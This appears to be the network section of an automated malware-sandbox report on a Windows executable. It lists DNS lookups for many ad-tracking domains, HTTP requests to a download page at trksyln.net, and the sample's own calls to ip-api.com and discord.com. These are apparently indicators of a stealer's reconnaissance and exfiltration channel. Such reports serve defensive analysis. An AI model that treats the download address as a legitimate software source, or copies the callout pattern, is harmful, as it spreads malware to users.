                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.333117008 CET1.1.1.1192.168.2.40x6df1No error (0)a.fsdn.coma.fsdn.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.333621025 CET1.1.1.1192.168.2.40xff1dNo error (0)upload.wikimedia.org185.15.59.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.335952997 CET1.1.1.1192.168.2.40x2804No error (0)fundingchoicesmessages.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.335952997 CET1.1.1.1192.168.2.40x2804No error (0)www3.l.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.336723089 CET1.1.1.1192.168.2.40xf3e7No error (0)a.fsdn.coma.fsdn.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.336941004 CET1.1.1.1192.168.2.40xa1afNo error (0)fundingchoicesmessages.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:31.784216881 CET1.1.1.1192.168.2.40x2e5bNo error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:31.784625053 CET1.1.1.1192.168.2.40xac0aNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.225244045 CET1.1.1.1192.168.2.40x381No error (0)sync.ipredictive.com107.21.226.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.225244045 CET1.1.1.1192.168.2.40x381No error (0)sync.ipredictive.com34.228.205.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.225244045 CET1.1.1.1192.168.2.40x381No error (0)sync.ipredictive.com18.205.69.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.225244045 CET1.1.1.1192.168.2.40x381No error (0)sync.ipredictive.com54.167.186.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.225244045 CET1.1.1.1192.168.2.40x381No error (0)sync.ipredictive.com3.219.15.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.225244045 CET1.1.1.1192.168.2.40x381No error (0)sync.ipredictive.com107.20.90.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.225244045 CET1.1.1.1192.168.2.40x381No error (0)sync.ipredictive.com3.214.53.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.225244045 CET1.1.1.1192.168.2.40x381No error (0)sync.ipredictive.com52.0.8.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.226049900 CET1.1.1.1192.168.2.40x7c1No error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.226049900 CET1.1.1.1192.168.2.40x7c1No error (0)tagr-pixel-nginx-odr-euw4.mookie1.com34.160.236.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.226156950 CET1.1.1.1192.168.2.40xbf0aNo error (0)um.simpli.fi35.204.158.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.226156950 CET1.1.1.1192.168.2.40xbf0aNo error (0)um.simpli.fi34.91.62.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.226156950 CET1.1.1.1192.168.2.40xbf0aNo error (0)um.simpli.fi35.204.74.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.226167917 CET1.1.1.1192.168.2.40x7b22No error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.226528883 CET1.1.1.1192.168.2.40x9290No error (0)s.uuidksinc.net185.98.54.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.226528883 CET1.1.1.1192.168.2.40x9290No error (0)s.uuidksinc.net31.220.27.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.226528883 CET1.1.1.1192.168.2.40x9290No error (0)s.uuidksinc.net31.220.27.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.226528883 CET1.1.1.1192.168.2.40x9290No error (0)s.uuidksinc.net31.220.27.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.228221893 CET1.1.1.1192.168.2.40xaafcNo error (0)bh.contextweb.comam1-bh.contextweb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.228221893 CET1.1.1.1192.168.2.40xaafcNo error (0)am1-bh.contextweb.comam1-direct-bgp.contextweb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.228221893 CET1.1.1.1192.168.2.40xaafcNo error (0)am1-direct-bgp.contextweb.com208.93.169.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.228341103 CET1.1.1.1192.168.2.40x6db5No error (0)dsp.adkernel.com174.137.133.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.230096102 CET1.1.1.1192.168.2.40xb54aNo error (0)bh.contextweb.comam1-bh.contextweb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.230096102 CET1.1.1.1192.168.2.40xb54aNo error (0)am1-bh.contextweb.comam1-direct-bgp.contextweb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.231134892 CET1.1.1.1192.168.2.40xb4b9No error (0)www.temu.comtemu-gtm.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.231353998 CET1.1.1.1192.168.2.40x24bcNo error (0)www.temu.comtemu-gtm.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.231353998 CET1.1.1.1192.168.2.40x24bcNo error (0)gw-c-eu-isp.temu.com20.157.217.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.231353998 CET1.1.1.1192.168.2.40x24bcNo error (0)gw-c-eu-isp.temu.com20.47.117.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.231353998 CET1.1.1.1192.168.2.40x24bcNo error (0)gw-c-eu-isp.temu.com20.157.119.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.231353998 CET1.1.1.1192.168.2.40x24bcNo error (0)gw-c-eu-isp.temu.com20.157.217.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.232635975 CET1.1.1.1192.168.2.40x10e6No error (0)cm.g.doubleclick.net142.250.185.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.358098984 CET1.1.1.1192.168.2.40xa329No error (0)dclk-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.358110905 CET1.1.1.1192.168.2.40xb353No error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.358110905 CET1.1.1.1192.168.2.40xb353No error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.358122110 CET1.1.1.1192.168.2.40xe18aNo error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.358122110 CET1.1.1.1192.168.2.40xe18aNo error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.358819008 CET1.1.1.1192.168.2.40x6bcbNo error (0)dclk-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.359174967 CET1.1.1.1192.168.2.40x44a7No error (0)match.prod.bidr.io54.170.20.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.359174967 CET1.1.1.1192.168.2.40x44a7No error (0)match.prod.bidr.io54.74.251.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.359174967 CET1.1.1.1192.168.2.40x44a7No error (0)match.prod.bidr.io54.229.65.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.359174967 CET1.1.1.1192.168.2.40x44a7No error (0)match.prod.bidr.io34.248.57.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.359174967 CET1.1.1.1192.168.2.40x44a7No error (0)match.prod.bidr.io52.48.7.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.359174967 CET1.1.1.1192.168.2.40x44a7No error (0)match.prod.bidr.io52.208.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.359174967 CET1.1.1.1192.168.2.40x44a7No error (0)match.prod.bidr.io34.242.183.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.360259056 CET1.1.1.1192.168.2.40x72ebNo error (0)a.c.appier.netgocm-geo.c.appier.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.360515118 CET1.1.1.1192.168.2.40x8b78No error (0)sync.srv.stackadapt.com54.88.211.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.360515118 CET1.1.1.1192.168.2.40x8b78No error (0)sync.srv.stackadapt.com3.217.190.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.360515118 CET1.1.1.1192.168.2.40x8b78No error (0)sync.srv.stackadapt.com3.211.176.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.360515118 CET1.1.1.1192.168.2.40x8b78No error (0)sync.srv.stackadapt.com3.210.235.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.360515118 CET1.1.1.1192.168.2.40x8b78No error (0)sync.srv.stackadapt.com52.2.10.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.360515118 CET1.1.1.1192.168.2.40x8b78No error (0)sync.srv.stackadapt.com35.175.17.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.360515118 CET1.1.1.1192.168.2.40x8b78No error (0)sync.srv.stackadapt.com3.224.31.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.360515118 CET1.1.1.1192.168.2.40x8b78No error (0)sync.srv.stackadapt.com3.210.226.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.365166903 CET1.1.1.1192.168.2.40xdf9eNo error (0)sync2-dsp.e-volution.ai8.2.111.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.375329018 CET1.1.1.1192.168.2.40xdd98No error (0)a.c.appier.netgocm-geo.c.appier.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.437880993 CET1.1.1.1192.168.2.40xb1aNo error (0)match.adsrvr.org35.71.131.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.437880993 CET1.1.1.1192.168.2.40xb1aNo error (0)match.adsrvr.org3.33.220.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.437880993 CET1.1.1.1192.168.2.40xb1aNo error (0)match.adsrvr.org52.223.40.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.437880993 CET1.1.1.1192.168.2.40xb1aNo error (0)match.adsrvr.org15.197.193.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.438437939 CET1.1.1.1192.168.2.40x5226No error (0)pr-bh.ybp.yahoo.comds-pr-bh.ybp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.438437939 CET1.1.1.1192.168.2.40x5226No error (0)ds-pr-bh.ybp.gysm.yahoodns.net52.16.92.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.438437939 CET1.1.1.1192.168.2.40x5226No error (0)ds-pr-bh.ybp.gysm.yahoodns.net34.248.206.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.438437939 CET1.1.1.1192.168.2.40x5226No error (0)ds-pr-bh.ybp.gysm.yahoodns.net54.170.107.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.438437939 CET1.1.1.1192.168.2.40x5226No error (0)ds-pr-bh.ybp.gysm.yahoodns.net54.220.156.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.438450098 CET1.1.1.1192.168.2.40x3dd8No error (0)pr-bh.ybp.yahoo.comds-pr-bh.ybp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.440098047 CET1.1.1.1192.168.2.40x2e06No error (0)dis.criteo.comwidget.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.440330029 CET1.1.1.1192.168.2.40x3998No error (0)dis.criteo.comwidget.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.440330029 CET1.1.1.1192.168.2.40x3998No error (0)widget.nl3.vip.prod.criteo.com178.250.1.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.449698925 CET1.1.1.1192.168.2.40x3a2bNo error (0)gtrace.mediago.io35.214.168.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.563087940 CET1.1.1.1192.168.2.40x6d0dNo error (0)ads.travelaudience.com35.190.0.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.566612959 CET1.1.1.1192.168.2.40x8f6dNo error (0)onetag-sys.com51.89.9.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.566612959 CET1.1.1.1192.168.2.40x8f6dNo error (0)onetag-sys.com51.89.9.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.566612959 CET1.1.1.1192.168.2.40x8f6dNo error (0)onetag-sys.com51.89.9.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.566612959 CET1.1.1.1192.168.2.40x8f6dNo error (0)onetag-sys.com51.75.86.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.566612959 CET1.1.1.1192.168.2.40x8f6dNo error (0)onetag-sys.com51.38.120.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.566612959 CET1.1.1.1192.168.2.40x8f6dNo error (0)onetag-sys.com51.89.9.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.824080944 CET1.1.1.1192.168.2.40xbfd3No error (0)widget.us.criteo.comwidget.us5.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.824080944 CET1.1.1.1192.168.2.40xbfd3No error (0)widget.us5.vip.prod.criteo.com74.119.117.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.824124098 CET1.1.1.1192.168.2.40xf51No error (0)widget.us.criteo.comwidget.us5.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.649017096 CET1.1.1.1192.168.2.40x5169No error (0)ep1.adtrafficquality.google65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.649161100 CET1.1.1.1192.168.2.40x1653No error (0)ep1.adtrafficquality.google216.58.206.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.145904064 CET1.1.1.1192.168.2.40xd1eaNo error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.145953894 CET1.1.1.1192.168.2.40x7d85No error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.145953894 CET1.1.1.1192.168.2.40x7d85No error (0)tagr-pixel-nginx-odr-euw4.mookie1.com34.160.236.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.154146910 CET1.1.1.1192.168.2.40xd3d3No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.154397964 CET1.1.1.1192.168.2.40xae1aNo error (0)cm.g.doubleclick.net172.217.16.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.155164957 CET1.1.1.1192.168.2.40x10c8No error (0)googleads.g.doubleclick.net142.250.186.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.155177116 CET1.1.1.1192.168.2.40x6794No error (0)widget.us.criteo.comwidget.us5.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.155177116 CET1.1.1.1192.168.2.40x6794No error (0)widget.us5.vip.prod.criteo.com74.119.117.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.155858040 CET1.1.1.1192.168.2.40x9d30No error (0)widget.us.criteo.comwidget.us5.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.182312965 CET1.1.1.1192.168.2.40xfa22No error (0)ep2.adtrafficquality.google216.58.206.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:41.365277052 CET1.1.1.1192.168.2.40x727dNo error (0)ep1.adtrafficquality.google142.250.185.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:41.365289927 CET1.1.1.1192.168.2.40xc795No error (0)ep1.adtrafficquality.google65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:41.771852016 CET1.1.1.1192.168.2.40x5eb1No error (0)ep2.adtrafficquality.google142.250.186.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:45.178270102 CET1.1.1.1192.168.2.40xa1a1No error (0)ep2.adtrafficquality.google172.217.16.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:54.964523077 CET1.1.1.1192.168.2.40xcc65No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.119106054 CET1.1.1.1192.168.2.40x445fNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.119106054 CET1.1.1.1192.168.2.40x445fNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.119106054 CET1.1.1.1192.168.2.40x445fNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.119106054 CET1.1.1.1192.168.2.40x445fNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.119106054 CET1.1.1.1192.168.2.40x445fNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      • trksyln.net
                                                                                                                                                                                                                                                                                                                      • https:
                                                                                                                                                                                                                                                                                                                        • code.jquery.com
                                                                                                                                                                                                                                                                                                                        • cdn.jsdelivr.net
                                                                                                                                                                                                                                                                                                                        • analytics.google.com
                                                                                                                                                                                                                                                                                                                        • td.doubleclick.net
                                                                                                                                                                                                                                                                                                                        • stats.g.doubleclick.net
                                                                                                                                                                                                                                                                                                                        • upload.wikimedia.org
                                                                                                                                                                                                                                                                                                                        • fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                        • www.google.com
                                                                                                                                                                                                                                                                                                                        • odr.mookie1.com
                                                                                                                                                                                                                                                                                                                        • sync2-dsp.e-volution.ai
                                                                                                                                                                                                                                                                                                                        • sync.ipredictive.com
                                                                                                                                                                                                                                                                                                                        • dsp.adkernel.com
                                                                                                                                                                                                                                                                                                                        • www.temu.com
                                                                                                                                                                                                                                                                                                                        • bh.contextweb.com
                                                                                                                                                                                                                                                                                                                        • s.uuidksinc.net
                                                                                                                                                                                                                                                                                                                        • sync.srv.stackadapt.com
                                                                                                                                                                                                                                                                                                                        • um.simpli.fi
                                                                                                                                                                                                                                                                                                                        • match.prod.bidr.io
                                                                                                                                                                                                                                                                                                                        • dis.criteo.com
                                                                                                                                                                                                                                                                                                                        • gtrace.mediago.io
                                                                                                                                                                                                                                                                                                                        • match.adsrvr.org
                                                                                                                                                                                                                                                                                                                        • pr-bh.ybp.yahoo.com
                                                                                                                                                                                                                                                                                                                        • ads.travelaudience.com
                                                                                                                                                                                                                                                                                                                        • onetag-sys.com
                                                                                                                                                                                                                                                                                                                        • widget.us.criteo.com
                                                                                                                                                                                                                                                                                                                        • ep1.adtrafficquality.google
                                                                                                                                                                                                                                                                                                                        • ep2.adtrafficquality.google
                                                                                                                                                                                                                                                                                                                      • discord.com
                                                                                                                                                                                                                                                                                                                      • otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      • www.trksyln.net
                                                                                                                                                                                                                                                                                                                      • ip-api.com
                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      0192.168.2.449738160.153.155.187807284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.909230947 CET446OUTGET /tgmacro/download HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: www.trksyln.net
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.540455103 CET420INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                      Location: https://trksyln.net/tgmacro/download
                                                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                      X-Powered-By-Plesk: PleskWin
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:17 GMT
                                                                                                                                                                                                                                                                                                                      Content-Length: 159
                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 74 72 6b 73 79 6c 6e 2e 6e 65 74 2f 74 67 6d 61 63 72 6f 2f 64 6f 77 6e 6c 6f 61 64 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                                                                                                                                      Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://trksyln.net/tgmacro/download">here</a></body>
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.750243902 CET420INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                      Location: https://trksyln.net/tgmacro/download
                                                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                      X-Powered-By-Plesk: PleskWin
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:17 GMT
                                                                                                                                                                                                                                                                                                                      Content-Length: 159
                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 74 72 6b 73 79 6c 6e 2e 6e 65 74 2f 74 67 6d 61 63 72 6f 2f 64 6f 77 6e 6c 6f 61 64 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                                                                                                                                      Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://trksyln.net/tgmacro/download">here</a></body>
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.549196005 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:48.567055941 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                      Data Ascii:


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      1192.168.2.451252208.95.112.1807532C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:54.974211931 CET116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: ip-api.com
